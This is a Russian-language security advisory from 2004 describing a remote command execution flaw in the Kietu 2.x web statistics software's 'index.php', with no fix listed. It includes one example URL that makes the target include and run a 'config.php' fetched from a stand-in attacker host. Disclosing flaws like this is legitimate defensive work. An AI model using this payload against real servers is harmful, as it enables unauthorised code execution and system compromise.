Удаленное выполнение произвольных команд в 'Kietu?'

Дата публикации:
01.02.2004
Всего просмотров:
1016
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Kietu 2.x
Уязвимые версии: Kietu?

Описание: Уязвимость обнаружена в 'Kietu?' web site statistics software в 'index.php'. Удаленный пользователь может выполнить произвольные команды операционной системы на целевой системе.

Пример/Эксплоит:

http://[target]/index.php?kietu[ur l_hit]=http://[attacker]/,
где 'http://[attacker]/config.php'

URL производителя:http://www.kietu.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Kietu 'index.php' flaw

или введите имя

CAPTCHA